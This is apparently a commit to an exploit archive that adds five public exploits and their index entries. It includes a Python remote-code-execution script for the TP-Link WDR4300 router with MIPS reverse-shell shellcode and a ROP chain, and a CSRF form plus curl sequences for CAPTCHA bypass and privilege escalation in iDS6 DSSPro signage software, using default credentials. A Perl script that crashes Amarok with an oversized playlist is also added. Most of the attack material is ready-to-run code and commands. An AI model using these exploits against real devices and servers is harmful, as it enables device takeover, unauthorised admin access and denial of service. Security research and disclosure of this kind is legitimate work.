DB: 2020-11-06
5 changes to exploits/shellcodes Amarok 2.8.0 - Denial-of-Service TP-Link WDR4300 - Remote Code Execution (Authenticated) iDS6 DSSPro Digital Signage System 6.2 - Cross-Site Request Forgery (CSRF) iDS6 DSSPro Digital Signage System 6.2 - CAPTCHA Security Bypass iDS6 DSSPro Digital Signage System 6.2 - Improper Access Control Privilege Escalation
This commit is contained in:
parent
543f8dc781
commit
6eb03eae23
6 changed files with 498 additions and 0 deletions
219
exploits/hardware/remote/48994.py
Executable file
219
exploits/hardware/remote/48994.py
Executable file
|
@ -0,0 +1,219 @@
|
|||
# Exploit Title: TP-Link WDR4300 - Remote Code Execution (Authenticated)
|
||||
# Date: 2020-08-28
|
||||
# Exploit Author: Patrik Lantz
|
||||
# Vendor Homepage: https://www.tp-link.com/se/home-networking/wifi-router/tl-wdr4300/
|
||||
# Version: TL-WDR4300, N750 Wireless Dual Band Gigabit Router
|
||||
# Tested on: Firmware version 3.13.33 and 3.14.3
|
||||
# CVE : CVE-2017-13772
|
||||
|
||||
#!/usr/bin/python3
|
||||
|
||||
import sys
|
||||
import hashlib
|
||||
import base64
|
||||
import requests
|
||||
import binascii
|
||||
import socket
|
||||
|
||||
|
||||
"""
|
||||
RCE via stack-based overflow on TP-Link WDR4300 (N750) devices, using CVE-2017-13772.
|
||||
Tested on Firmware versions 3.13.33, Build 130618 and 3.14.3 Build 150518, hardware WDR4300 v1
|
||||
|
||||
Usage:
|
||||
1) Start listener on attacker machine: nc -nlvvp 31337
|
||||
2) Execute script: python exploit.py <attacker_ip>
|
||||
|
||||
"""
|
||||
|
||||
def main(argv):
|
||||
if len(sys.argv) < 2:
|
||||
print("Usage: python exploit.py <attacker_ip>")
|
||||
sys.exit(1)
|
||||
|
||||
password = "admin"
|
||||
target = "192.168.0.1:80"
|
||||
attacker_ip = sys.argv[1]
|
||||
|
||||
attacker = binascii.hexlify(socket.inet_aton(attacker_ip))
|
||||
ip = [attacker[i:i+2] for i in range(0, len(attacker), 2)]
|
||||
|
||||
if '00' in ip or '20' in ip:
|
||||
print("[-] Specified attacker IP will result in bad characters being present in the shellcode. Avoid any IPs containing .0. and .32.")
|
||||
sys.exit(1)
|
||||
|
||||
url = "http://" + target + "/"
|
||||
try:
|
||||
r = requests.get(url=url)
|
||||
except:
|
||||
print("[-] Could not connect to target: " + target)
|
||||
sys.exit(1)
|
||||
|
||||
if 'WWW-Authenticate' in r.headers.keys():
|
||||
if not 'WDR4300' in r.headers['WWW-Authenticate']:
|
||||
print("[-] This is not TP-Link WDR4300 (N750)")
|
||||
sys.exit(1)
|
||||
else:
|
||||
print("[-] This does not seem to be the web interface of a router!")
|
||||
|
||||
|
||||
credentials = "admin" + ":" + hashlib.md5(password).hexdigest()
|
||||
auth = base64.b64encode(credentials)
|
||||
url = "http://" + target + "/userRpm/LoginRpm.htm?Save=Save"
|
||||
|
||||
print("[+] Setting target to: " + target)
|
||||
print("[+] Using default admin password: " + password)
|
||||
print("[+] Cookie set to: Authorization=Basic%20" + auth)
|
||||
|
||||
h = {}
|
||||
h["Cookie"] = "Authorization=Basic%20" + auth
|
||||
h['Upgrade-Insecure-Requests'] = '1'
|
||||
h['Referer'] = 'http://' + target + '/'
|
||||
|
||||
r = requests.get(url = url, headers=h)
|
||||
data = r.text
|
||||
if "httpAutErrorArray" in data:
|
||||
print('[-] Could not login to the admin interface')
|
||||
sys.exit(1)
|
||||
|
||||
older_fw = False
|
||||
# older firmware, e.g., 3.13.33
|
||||
if "<TITLE>Login Incorrect</TITLE>" in data:
|
||||
print("[-] Incorrect login, perhaps an older firmware? Sending digest authetnication using the Authorization header instead..")
|
||||
credentials = "admin:" + password
|
||||
auth = base64.b64encode(credentials)
|
||||
url = "http://" + target + "/"
|
||||
h = {}
|
||||
h["Authorization"] = "Basic%20" + auth
|
||||
h['Upgrade-Insecure-Requests'] = '1'
|
||||
h['Referer'] = 'http://' + target + '/'
|
||||
r = requests.get(url = url, headers=h)
|
||||
data = r.text
|
||||
if 'window.parent.location.href' not in data:
|
||||
print("[-] Failed to login to the admin interface")
|
||||
sys.exit(1)
|
||||
print('[+] Older firmware confirmed, successfully logged in')
|
||||
older_fw = True
|
||||
|
||||
authenticated_url = data.split('window.parent.location.href = ')[1].split(';')[0].replace('"','')
|
||||
|
||||
|
||||
unique_id = ''
|
||||
if not older_fw:
|
||||
unique_id = authenticated_url.split('/userRpm')[0].split('/')[3] + '/'
|
||||
print("[+] Authentication succeeded, got unique id: " + unique_id.replace('/',''))
|
||||
|
||||
# now we deliver the exploit payload via a GET request
|
||||
h['Referer'] = 'http://' + target + '/' + unique_id + 'userRpm/DiagnosticRpm.htm'
|
||||
|
||||
|
||||
# NOP sled (XOR $t0, $t0, $t0; as NOP is only null bytes)
|
||||
nopsled = ""
|
||||
for i in range(12):
|
||||
nopsled += "\x26\x40\x08\x01"
|
||||
|
||||
# identified bad characters: 0x20,0x00
|
||||
# Using reverse tcp shellcode from https://www.exploit-db.com/exploits/45541
|
||||
buf = b""
|
||||
buf += "\x24\x0f\xff\xfa" # li $t7, -6
|
||||
buf += "\x01\xe0\x78\x27" # nor $t7, $zero
|
||||
buf += "\x21\xe4\xff\xfd" # addi $a0, $t7, -3
|
||||
buf += "\x21\xe5\xff\xfd" # addi $a1, $t7, -3
|
||||
buf += "\x28\x06\xff\xff" # slti $a2, $zero, -1
|
||||
buf += "\x24\x02\x10\x57" # li $v0, 4183 ( sys_socket )
|
||||
buf += "\x01\x01\x01\x0c" # syscall 0x40404
|
||||
buf += "\xaf\xa2\xff\xff" # sw $v0, -1($sp)
|
||||
buf += "\x8f\xa4\xff\xff" # lw $a0, -1($sp)
|
||||
buf += "\x34\x0f\xff\xfd" # li $t7, -3 ( sa_family = AF_INET )
|
||||
buf += "\x01\xe0\x78\x27" # nor $t7, $zero
|
||||
buf += "\xaf\xaf\xff\xe0" # sw $t7, -0x20($sp)
|
||||
buf += "\x3c\x0e\x7a\x69" # lui $t6, 0x7a69 ( sin_port = 0x7a69 )
|
||||
buf += "\x35\xce\x7a\x69" # ori $t6, $t6, 0x7a69
|
||||
buf += "\xaf\xae\xff\xe4" # sw $t6, -0x1c($sp)
|
||||
buf += "\x3c\x0e" + ip[0].decode('hex') + ip[1].decode('hex') # lui $t6, 0xAABB ( sin_addr = 0xAABB ...
|
||||
buf += "\x35\xce" + ip[2].decode('hex') + ip[3].decode('hex') # ori $t6, $t6, 0xCCDD ... 0xCCDD
|
||||
buf += "\xaf\xae\xff\xe6" # sw $t6, -0x1a($sp)
|
||||
buf += "\x27\xa5\xff\xe2" # addiu $a1, $sp, -0x1e
|
||||
buf += "\x24\x0c\xff\xef" # li $t4, -17 ( addrlen = 16 )
|
||||
buf += "\x01\x80\x30\x27" # nor $a2, $t4, $zero
|
||||
buf += "\x24\x02\x10\x4a" # li $v0, 4170 ( sys_connect )
|
||||
buf += "\x01\x01\x01\x0c" # syscall 0x40404
|
||||
buf += "\x24\x0f\xff\xfd" # li t7,-3
|
||||
buf += "\x01\xe0\x28\x27" # nor a1,t7,zero
|
||||
buf += "\x8f\xa4\xff\xff" # lw $a0, -1($sp)
|
||||
buf += "\x24\x02\x0f\xdf" # li $v0, 4063 ( sys_dup2 )
|
||||
buf += "\x01\x01\x01\x0c" # syscall 0x40404
|
||||
buf += "\x24\xa5\xff\xff" # addi a1,a1,-1 (\x20\xa5\xff\xff)
|
||||
buf += "\x24\x01\xff\xff" # li at,-1
|
||||
buf += "\x14\xa1\xff\xfb" # bne a1,at, dup2_loop
|
||||
buf += "\x28\x06\xff\xff" # slti $a2, $zero, -1
|
||||
buf += "\x3c\x0f\x2f\x2f" # lui $t7, 0x2f2f
|
||||
buf += "\x35\xef\x62\x69" # ori $t7, $t7, 0x6269
|
||||
buf += "\xaf\xaf\xff\xec" # sw $t7, -0x14($sp)
|
||||
buf += "\x3c\x0e\x6e\x2f" # lui $t6, 0x6e2f
|
||||
buf += "\x35\xce\x73\x68" # ori $t6, $t6, 0x7368
|
||||
buf += "\xaf\xae\xff\xf0" # sw $t6, -0x10($sp)
|
||||
buf += "\xaf\xa0\xff\xf4" # sw $zero, -0xc($sp)
|
||||
buf += "\x27\xa4\xff\xec" # addiu $a0, $sp, -0x14
|
||||
buf += "\xaf\xa4\xff\xf8" # sw $a0, -8($sp)
|
||||
buf += "\xaf\xa0\xff\xfc" # sw $zero, -4($sp)
|
||||
buf += "\x27\xa5\xff\xf8" # addiu $a1, $sp, -8
|
||||
buf += "\x24\x02\x0f\xab" # li $v0, 4011 (sys_execve)
|
||||
buf += "\x01\x01\x01\x0c" # syscall 0x40404
|
||||
|
||||
shellcode = nopsled + buf
|
||||
|
||||
"""
|
||||
We control $ra, $s0 and $s1 via the buffer overflow.
|
||||
|
||||
libc_base: 0x2aae2000
|
||||
First ROP (sleep_gadget): 0x0004c974 + libc_base = 0x2ab2e974
|
||||
0x0004c97c move t9, s0
|
||||
0x0004c980 lw ra, (var_1ch)
|
||||
0x0004c984 lw s0, (var_18h)
|
||||
0x0004c988 addiu a0, zero, 2 ; arg1
|
||||
0x0004c98c addiu a1, zero, 1 ; arg2
|
||||
0x0004c990 move a2, zero
|
||||
0x0004c994 jr t9
|
||||
|
||||
sleep is located at 0x00053ca0 => so $s0 = 0x2ab35ca0
|
||||
|
||||
This gadget calls sleep, in this gadget we also set the return adress to the second ROP gadget which is controlled by setting appropriate value on the stack location 0x1c($sp), i.e., the first value on the stack, due to the instruction at 0x0004c980.
|
||||
|
||||
|
||||
Second ROP (stack_gadget): 0x00039fa8 + libc_base = 0x2ab1bfa8
|
||||
0x00039fa8 addiu s0, sp, 0x28
|
||||
0x00039fac move a0, s3
|
||||
0x00039fb0 move a1, s0
|
||||
0x00039fb4 move t9, s1
|
||||
0x00039fb8 jalr t9
|
||||
|
||||
This gadget will set s0 to point our shellcode on the stack, that must be located at sp+0x28.
|
||||
Then as we control s1, we jump to the last and third ROP gadget.
|
||||
|
||||
Third ROP (call_gadget): 0x000406d8 + libc_base = 0x2ab226d8
|
||||
0x000406d8 move t9, s0
|
||||
0x000406dc jalr t9
|
||||
|
||||
Jump to the shellcode pointed in s0.
|
||||
"""
|
||||
|
||||
sleep_addr = "\x2a\xb3\x5c\xa0"
|
||||
sleep_gadget = "\x2a\xb2\xe9\x74"
|
||||
stack_gadget = "\x2a\xb1\xbf\xa8"
|
||||
call_gadget = "\x2a\xb2\x26\xd8"
|
||||
|
||||
junk = "J"*28
|
||||
payload = "A"*160 + sleep_addr + call_gadget + sleep_gadget + junk + stack_gadget + shellcode
|
||||
|
||||
p = {'ping_addr': payload, 'doType': 'ping', 'isNew': 'new', 'sendNum': '4', 'pSize':64, 'overTime':'800', 'trHops':'20'}
|
||||
url = "http://" + target + "/" + unique_id + "userRpm/PingIframeRpm.htm"
|
||||
print("[+] Delivering exploit payload to: " + url)
|
||||
try:
|
||||
r = requests.get(url = url, params=p, headers=h, timeout=10)
|
||||
except:
|
||||
print("[+] Finished delivering exploit")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main(sys.argv[1:])
|
61
exploits/hardware/webapps/48990.txt
Normal file
61
exploits/hardware/webapps/48990.txt
Normal file
|
@ -0,0 +1,61 @@
|
|||
# Exploit Title: iDS6 DSSPro Digital Signage System 6.2 - Cross-Site Request Forgery (CSRF)
|
||||
# Date: 2020-07-16
|
||||
# Exploit Author: LiquidWorm
|
||||
# Vendor Homepage: http://www.yerootech.com
|
||||
# Version: 6.2
|
||||
|
||||
iDS6 DSSPro Digital Signage System 6.2 Cross-Site Request Forgery (CSRF)
|
||||
|
||||
|
||||
Vendor: Guangzhou Yeroo Tech Co., Ltd.
|
||||
Product web page: http://www.yerootech.com
|
||||
Affected version: V6.2 B2014.12.12.1220
|
||||
V5.6 B2017.07.12.1757
|
||||
V4.3
|
||||
|
||||
Summary: iDS6 Software's DSSPro network digital signage management system
|
||||
is a web-based server software solution for Windows.
|
||||
|
||||
Desc: The application interface allows users to perform certain actions via
|
||||
HTTP requests without performing any validity checks to verify the requests.
|
||||
This can be exploited to perform certain actions with administrative privileges
|
||||
if a logged-in user visits a malicious web site.
|
||||
|
||||
Tested on: Microsoft Windows XP
|
||||
Microsoft Windows 7
|
||||
Microsfot Windows Server 2008
|
||||
Microsoft Windows Server 2012
|
||||
Microsoft Windows 10
|
||||
Apache Tomcat/8.0.44
|
||||
Apache Tomcat/6.0.35
|
||||
Apache-Coyote/1.1
|
||||
Apache Axis/1.4
|
||||
MySQL 5.5.25
|
||||
Java 1.8.0
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2020-5606
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5606.php
|
||||
|
||||
|
||||
16.07.2020
|
||||
|
||||
--
|
||||
|
||||
|
||||
Add user:
|
||||
---------
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://192.168.1.88/Pages/user!addUser" method="POST">
|
||||
<input type="hidden" name="user.userName" value="testingus" />
|
||||
<input type="hidden" name="user.password" value="zeroscience" />
|
||||
<input type="submit" value="add()" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
77
exploits/hardware/webapps/48991.txt
Normal file
77
exploits/hardware/webapps/48991.txt
Normal file
|
@ -0,0 +1,77 @@
|
|||
# Exploit Title: iDS6 DSSPro Digital Signage System 6.2 - CAPTCHA Security Bypass
|
||||
# Date: 2020-07-16
|
||||
# Exploit Author: LiquidWorm
|
||||
# Vendor Homepage: http://www.yerootech.com
|
||||
# Version: 6.2
|
||||
|
||||
iDS6 DSSPro Digital Signage System 6.2 CAPTCHA Security Bypass
|
||||
|
||||
|
||||
Vendor: Guangzhou Yeroo Tech Co., Ltd.
|
||||
Product web page: http://www.yerootech.com
|
||||
Affected version: V6.2 B2014.12.12.1220
|
||||
V5.6 B2017.07.12.1757
|
||||
V4.3
|
||||
|
||||
Summary: iDS6 Software's DSSPro network digital signage management
|
||||
system is a web-based server software solution for Windows.
|
||||
|
||||
Desc: The CAPTCHA function for DSSPro is prone to a security bypass
|
||||
vulnerability that occurs in the CAPTCHA authentication routine. By
|
||||
requesting the autoLoginVerifyCode object an attacker can receive a
|
||||
JSON message code and successfully bypass the CAPTCHA-based authentication
|
||||
challenge and perform brute-force attacks.
|
||||
|
||||
Tested on: Microsoft Windows XP
|
||||
Microsoft Windows 7
|
||||
Microsfot Windows Server 2008
|
||||
Microsoft Windows Server 2012
|
||||
Microsoft Windows 10
|
||||
Apache Tomcat/8.0.44
|
||||
Apache Tomcat/6.0.35
|
||||
Apache-Coyote/1.1
|
||||
Apache Axis/1.4
|
||||
MySQL 5.5.25
|
||||
Java 1.8.0
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2020-5607
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5607.php
|
||||
|
||||
|
||||
16.07.2020
|
||||
|
||||
--
|
||||
|
||||
|
||||
Get CAPTCHA code:
|
||||
-----------------
|
||||
|
||||
$ curl -i http://192.168.1.88/Pages/login\!autoLoginVerifyCode -c cookies.txt
|
||||
|
||||
{"success":true,"message":"6435","data":"6435"}
|
||||
|
||||
|
||||
Use CAPTCHA code:
|
||||
-----------------
|
||||
|
||||
$ curl -i http://192.168.1.88/Pages/login\!userValidate -b cookies.txt -d "shortName=&user.userName=boss&user.password=boss&loginVerifyCode=6435&autoSave=true&autoLogin=true&domain_login=" -v
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
Server: Apache-Coyote/1.1
|
||||
Set-Cookie: cookie.username=boss; Expires=Wed, 21-Jul-2021 19:41:26 GMT
|
||||
Set-Cookie: cookie.password=boss; Expires=Wed, 01-Jul-2021 19:41:26 GMT
|
||||
Set-Cookie: cookie.autosave=true; Expires=Wed, 01-Jul-2021 19:41:26 GMT
|
||||
Set-Cookie: cookie.autologin=true; Expires=Wed, 01-Jul-2021 19:41:26 GMT
|
||||
Cache-Control: no-cache
|
||||
Pragma: no-cache
|
||||
Content-Type: application/x-json;charset=UTF-8
|
||||
Date: Tue, 21 Jul 2020 19:41:26 GMT
|
||||
Connection: close
|
||||
Content-Length: 16
|
||||
|
||||
{"success":true}
|
121
exploits/hardware/webapps/48992.txt
Normal file
121
exploits/hardware/webapps/48992.txt
Normal file
|
@ -0,0 +1,121 @@
|
|||
# Exploit Title: iDS6 DSSPro Digital Signage System 6.2 - Improper Access Control Privilege Escalation
|
||||
# Date: 2020-07-16
|
||||
# Exploit Author: LiquidWorm
|
||||
# Vendor Homepage: http://www.yerootech.com
|
||||
# Version: 6.2
|
||||
|
||||
iDS6 DSSPro Digital Signage System 6.2 Improper Access Control Privilege Escalation
|
||||
|
||||
|
||||
Vendor: Guangzhou Yeroo Tech Co., Ltd.
|
||||
Product web page: http://www.yerootech.com
|
||||
Affected version: V6.2 B2014.12.12.1220
|
||||
V5.6 B2017.07.12.1757
|
||||
V4.3
|
||||
|
||||
Summary: iDS6 Software's DSSPro network digital signage management system
|
||||
is a web-based server software solution for Windows.
|
||||
|
||||
Desc: The application suffers from a privilege escalation vulnerability.
|
||||
An authenticated user can elevate his/her privileges by calling JS functions
|
||||
from the console or by insecure direct object references to hidden functionalities
|
||||
that can result in creating users, modifying roles and permissions and full
|
||||
takeover of the application.
|
||||
|
||||
Tested on: Microsoft Windows XP
|
||||
Microsoft Windows 7
|
||||
Microsfot Windows Server 2008
|
||||
Microsoft Windows Server 2012
|
||||
Microsoft Windows 10
|
||||
Apache Tomcat/8.0.44
|
||||
Apache Tomcat/6.0.35
|
||||
Apache-Coyote/1.1
|
||||
Apache Axis/1.4
|
||||
MySQL 5.5.25
|
||||
Java 1.8.0
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2020-5608
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5608.php
|
||||
|
||||
|
||||
16.07.2020
|
||||
|
||||
--
|
||||
|
||||
|
||||
--------------------
|
||||
Default credentials:
|
||||
--------------------
|
||||
|
||||
admin:123456 (id: n/k, access: /admin)
|
||||
boss:boss (id: 100001, access: /)
|
||||
user:user (id: 100002, access: /)
|
||||
|
||||
|
||||
----------------------------
|
||||
Once logged-in, create user:
|
||||
----------------------------
|
||||
|
||||
In Console, once navigated to the Accounts->User page (http://192.168.1.88/Pages/user.action)
|
||||
Type: add()
|
||||
|
||||
or issue a POST request:
|
||||
|
||||
$ curl -d "user.userName=testingus&user.password=testingus" http://192.168.1.88/Pages/user\!addUser -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"
|
||||
|
||||
|
||||
--------------
|
||||
List user IDs:
|
||||
--------------
|
||||
|
||||
$ curl -d "az=asc" http://192.168.1.88/Pages/user\!list -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"
|
||||
|
||||
|
||||
------------
|
||||
Create role:
|
||||
------------
|
||||
|
||||
In Console, once navigated to the Accounts->Role page (http://192.168.1.88/Pages/role.action):
|
||||
Type: add()
|
||||
|
||||
or issue a POST request:
|
||||
|
||||
$ curl -d "role.roleName=ROLENAME&role.description=ROLEDESC" http://192.168.1.88/Pages/role\!add -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"
|
||||
|
||||
|
||||
--------------
|
||||
List role IDs:
|
||||
--------------
|
||||
|
||||
$ curl -X POST http://192.168.1.88/Pages/role\!list -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"
|
||||
|
||||
|
||||
------------------------------------------
|
||||
Apply all permissions to the created role:
|
||||
------------------------------------------
|
||||
|
||||
$ curl http://192.168.1.88/Pages/role\!updatePermissions -d "role.roleId={ROLE_ID}&privileges=2&privileges=1&privileges=3&privileges=4&privileges=7&privileges=6&privileges=5&privileges=12&privileges=8&privileges=13&privileges=9&privileges=10&privileges=11&privileges=14&privileges=16&privileges=15&privileges=17&privileges=18&privileges=21&privileges=33&privileges=32&privileges=34&privileges=35&privileges=36&privileges=37&privileges=23&privileges=22&privileges=24&privileges=41&privileges=47&privileges=46&privileges=48&privileges=49&privileges=50&privileges=51&privileges=52&privileges=53"
|
||||
|
||||
|
||||
------------------------------------
|
||||
Assign created role to created user:
|
||||
------------------------------------
|
||||
|
||||
$ curl -d "user.userId={USER_ID}&roles={ROLE_ID}" http://192.168.1.88/Pages/user\!updateRole -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"
|
||||
|
||||
|
||||
------------
|
||||
Delete user:
|
||||
------------
|
||||
|
||||
In Console, once navigated to the Accounts->User page (http://192.168.1.88/Pages/user.action), select desired username:
|
||||
Type: del()
|
||||
|
||||
or issue a POST request:
|
||||
|
||||
$ curl -d "userid={USER_ID}" http://192.168.1.88/Pages/user\!del -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"
|
15
exploits/windows/local/48993.pl
Executable file
15
exploits/windows/local/48993.pl
Executable file
|
@ -0,0 +1,15 @@
|
|||
# Exploit Title: Amarok 2.8.0 - Denial-of-Service
|
||||
# Date: 1 November 2020
|
||||
# Exploit Author: FishballAndMeatball
|
||||
# Vendor Homepage: https://amarok.kde.org/
|
||||
# Software link: https://community.kde.org/Amarok/GettingStarted/Download
|
||||
# Version: Amarok 2.8.0
|
||||
# Tested on: Windows 10, Windows 7, Windows XP
|
||||
# CVE: CVE-2020-13152
|
||||
|
||||
my $file= “test_big.m3u“;
|
||||
my $junk= “\x41” x 6368545;
|
||||
open($FILE,”>$file”);
|
||||
print $FILE “$junk”;
|
||||
close($FILE);
|
||||
print “m3u File Created successfully\n”;
|
|
@ -10399,6 +10399,7 @@ id,file,description,date,author,type,platform,port
|
|||
48968,exploits/windows/local/48968.txt,"IP Watcher v3.0.0.30 - 'PACService.exe' Unquoted Service Path",2020-10-28,"Mohammed Alshehri",local,windows,
|
||||
48982,exploits/windows/local/48982.pdf,"Foxit Reader 9.7.1 - Remote Command Execution (Javascript API)",2020-11-02,"Nassim Asrir",local,windows,
|
||||
48983,exploits/windows/local/48983.txt,"Quick N Easy FTP Service 3.2 - Unquoted Service Path",2020-11-02,yunaranyancat,local,windows,
|
||||
48993,exploits/windows/local/48993.pl,"Amarok 2.8.0 - Denial-of-Service",2020-11-05,FishballAndMeatball,local,windows,
|
||||
42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
|
||||
42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
|
||||
42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,
|
||||
|
@ -17837,6 +17838,7 @@ id,file,description,date,author,type,platform,port
|
|||
48842,exploits/hardware/remote/48842.py,"Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow",2020-10-01,LiquidWorm,remote,hardware,
|
||||
48954,exploits/hardware/remote/48954.txt,"Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root",2020-10-27,LiquidWorm,remote,hardware,
|
||||
48958,exploits/hardware/remote/48958.py,"GoAhead Web Server 5.1.1 - Digest Authentication Capture Replay Nonce Reuse",2020-10-27,LiquidWorm,remote,hardware,
|
||||
48994,exploits/hardware/remote/48994.py,"TP-Link WDR4300 - Remote Code Execution (Authenticated)",2020-11-05,"Patrik Lantz",remote,hardware,
|
||||
42806,exploits/java/remote/42806.py,"Oracle WebLogic Server 10.3.6.0 - Java Deserialization Remote Code Execution",2017-09-27,SlidingWindow,remote,java,
|
||||
42888,exploits/hardware/remote/42888.sh,"Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution",2017-09-27,"Adam Brown",remote,hardware,
|
||||
42891,exploits/windows/remote/42891.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Man In The Middle Remote Code Execution",2017-09-28,hyp3rlinx,remote,windows,
|
||||
|
@ -40808,6 +40810,9 @@ id,file,description,date,author,type,platform,port
|
|||
48987,exploits/php/webapps/48987.txt,"PDW File Browser 1.3 - Remote Code Execution",2020-11-04,"David Bimmel",webapps,php,
|
||||
48988,exploits/php/webapps/48988.py,"School Log Management System 1.0 - 'username' SQL Injection / Remote Code Execution",2020-11-04,Mosaaed,webapps,php,
|
||||
48989,exploits/php/webapps/48989.py,"Student Attendance Management System 1.0 - 'username' SQL Injection / Remote Code Execution",2020-11-04,Mosaaed,webapps,php,
|
||||
48990,exploits/hardware/webapps/48990.txt,"iDS6 DSSPro Digital Signage System 6.2 - Cross-Site Request Forgery (CSRF)",2020-11-05,LiquidWorm,webapps,hardware,
|
||||
48991,exploits/hardware/webapps/48991.txt,"iDS6 DSSPro Digital Signage System 6.2 - CAPTCHA Security Bypass",2020-11-05,LiquidWorm,webapps,hardware,
|
||||
48992,exploits/hardware/webapps/48992.txt,"iDS6 DSSPro Digital Signage System 6.2 - Improper Access Control Privilege Escalation",2020-11-05,LiquidWorm,webapps,hardware,
|
||||
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
|
||||
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
|
||||
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue